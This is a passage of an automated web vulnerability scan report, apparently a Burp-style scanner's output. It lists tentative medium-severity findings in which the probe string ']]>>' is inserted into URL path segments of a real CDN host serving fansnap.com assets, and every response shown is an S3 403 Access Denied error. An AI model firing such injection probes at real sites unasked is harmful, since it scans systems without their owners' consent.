HTTP/1.0 403 Forbidden
x-amz-request-id: 8027425533BC406E
x-amz-id-2: RWTrlCOHgJBRcgajt4ZOyb7k/dwwEd4FJ+j+MTNQDKRwnbL77uYgwb47Ue18wi+R
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 853e3d4d0711b1f971a1db3debe65bfda07f9da5a7dd45b5990d93a4d038bb8d7d1fc7cb938b7382
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8027425533BC406E</RequestId><HostId>RWTrlCOHgJBRcgajt4ZOyb7k/dwwEd4FJ+j+MTNQDKRwnbL77u
...[SNIP]...

8.72. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-529.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DA8AB8E77A5BCB0C
x-amz-id-2: VRco0vO+vBzrBYqIC5Uc3ATwXs4nofMkb3DmwVzgYZgMjciReftTP82mKMaXK8/c
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: fa1feb0ee24144134d1fd14d80cf0837447d8e3760d52a885d29b743e926a85fd2558d9c0a12cc7f
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DA8AB8E77A5BCB0C</RequestId><HostId>VRco0vO+vBzrBYqIC5Uc3ATwXs4nofMkb3DmwVzgYZgMjciRef
...[SNIP]...

8.73. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 73FFA757180C7BB2
x-amz-id-2: ibM3a8fPDlQOxzTZRnQUs0Qan2w5EpLvn7VVclEX0XZUmaKOQaie8ku1WPnoX7PL
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7509039ce96282bd93584583a6c62212ffc1ce3e77068a44899b228032cc7b72d4d7f5381de972e0
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>73FFA757180C7BB2</RequestId><HostId>ibM3a8fPDlQOxzTZRnQUs0Qan2w5EpLvn7VVclEX0XZUmaKOQa
...[SNIP]...

8.74. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9E96194E7E0A71EC
x-amz-id-2: /xOLdFPAZASXrJj5A6VVGGxV+4QDFbnUQtv8fKDWlyZEGCFKc0yj2v6XwjkABzY7
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:47 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: adb02de788cb5067ac54225c4e53cfc88fc1c8f9223a266e970dd2097d02da7a1380f76f5a68fd21
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9E96194E7E0A71EC</RequestId><HostId>/xOLdFPAZASXrJj5A6VVGGxV+4QDFbnUQtv8fKDWlyZEGCFKc0
...[SNIP]...

8.75. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DBA51DD1B0F8B299
x-amz-id-2: pZdMj1PXiGqsqTC9yoO2nCegNfUF56vvjg3vkdvH44M6c8J01NAOh7VRS1SGIM0x
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d3a6514a00713df655c419499e6ed75363766cd17298d2c2698e0a24f74e2ec2631ce7c859dd55e2
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DBA51DD1B0F8B299</RequestId><HostId>pZdMj1PXiGqsqTC9yoO2nCegNfUF56vvjg3vkdvH44M6c8J01N
...[SNIP]...

8.76. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-549.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 46517C30218A5201
x-amz-id-2: 65bf+hQaTdmvGmaAPq8sYjJSp5LnhewLogyfx9sTge7zkBs32sU0LX0QQhEPROpC
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7e2921db1b0e89887724e104416227136392873881bfd55bf2b51f8c494d31fc75965a7620db84f9
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>46517C30218A5201</RequestId><HostId>65bf+hQaTdmvGmaAPq8sYjJSp5LnhewLogyfx9sTge7zkBs32s
...[SNIP]...

8.77. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-compact-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 66EAB228C38AF5A7
x-amz-id-2: xMMrH8jnd77GUeyQOBv3hIPiJmYeM8QK3HyaIvxWnga1dxJzyeF8ieB6bJd2QdLg
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 60d4d17a610893d278af31d8a528017145e9387f6582833b7f8a71e05eeb7e72581cc9b73f1dfa3f
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>66EAB228C38AF5A7</RequestId><HostId>xMMrH8jnd77GUeyQOBv3hIPiJmYeM8QK3HyaIvxWnga1dxJzye
...[SNIP]...

8.78. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-compact-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0DD7A862E58B1C81
x-amz-id-2: d8uJCuwU0bu6+4jhc8PtnKMTaGSkanPpZRlOeDjoQfkKvKjIMiT1t6eDKOyjbo6h
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 32ec464cb8d8d580ac0f593ce1eb7d555a4685f97a2c9e738bc673c91f1c13387a7587a40db7e7d1
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0DD7A862E58B1C81</RequestId><HostId>d8uJCuwU0bu6+4jhc8PtnKMTaGSkanPpZRlOeDjoQfkKvKjIMi
...[SNIP]...

8.79. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-compact-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E05D600F33B4ACED
x-amz-id-2: jyrzateb32FWQ+zrVTSeol1SGDNxRaKYmv6Q6/oREyI5PspwSGYOGBs1Tvrl3EpB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 60eb0d9a2107c7fbf96dcae1b668b28a317a609e19ae13c1dc59691d268c9f57c48e1c2fe5659d49
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E05D600F33B4ACED</RequestId><HostId>jyrzateb32FWQ+zrVTSeol1SGDNxRaKYmv6Q6/oREyI5PspwSG
...[SNIP]...

8.80. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 4] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A550A1622B33B69F
x-amz-id-2: iR+ya+/D1tqOeU2Abz47Y4C83CQWoxGy5k1zRoIDVsPADfoWV0LCekDacTDULbMR
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6b25503156d951bc2493678d3bcb2c75ffcf9f0b80d300e045a397060fbfd97e564ac324e9ee9b93
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A550A1622B33B69F</RequestId><HostId>iR+ya+/D1tqOeU2Abz47Y4C83CQWoxGy5k1zRoIDVsPADfoWV0
...[SNIP]...

8.81. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5812A0C13D9CA5E0
x-amz-id-2: NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTvSAvCh6vAp2AnPy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 43bbfbc07383a786c5681b750f8f2e290f5718cef3aa937ab20ecb1c6854fef3bd1d3f95430cc56c
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5812A0C13D9CA5E0</RequestId><HostId>NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTv
...[SNIP]...

8.82. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BA86D911F46F4716
x-amz-id-2: uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3zLnIYILHbxWb/C
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 970662699f85924f2c2c29486e589b66b0adf4165a5271b04ec761db3013e12c4fb9b541da4eb13f
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA86D911F46F4716</RequestId><HostId>uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3
...[SNIP]...

8.83. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 97A429F94A9FD51A
x-amz-id-2: qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHSU0M9PfzUekVSE+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e29dabf9fe8ed4f42c7246d8dee7887e37e2997b5215158cd6b98e25095287d49c94668efd7fb1f4
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>97A429F94A9FD51A</RequestId><HostId>qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHS
...[SNIP]...

8.84. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787]]>>/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9CB3E9864B675FF5
x-amz-id-2: m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHtXqQYi4B63yrzFi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0184ee5e1681cafc9cbbef83048f5d1bdd8441441311fd4fc3e5c937af7c98c28da302261f0772fd
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9CB3E9864B675FF5</RequestId><HostId>m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHt
...[SNIP]...

8.85. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets]]>>/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 03933044C122185D
x-amz-id-2: cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9/OU4aBC1elNPDy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f60ef12403b58d644a462fdf49f78d9ec010b0309156838569b751992bb44af68fe78db2b9e3de5c
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>03933044C122185D</RequestId><HostId>cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9
...[SNIP]...

8.86. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css]]>>/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
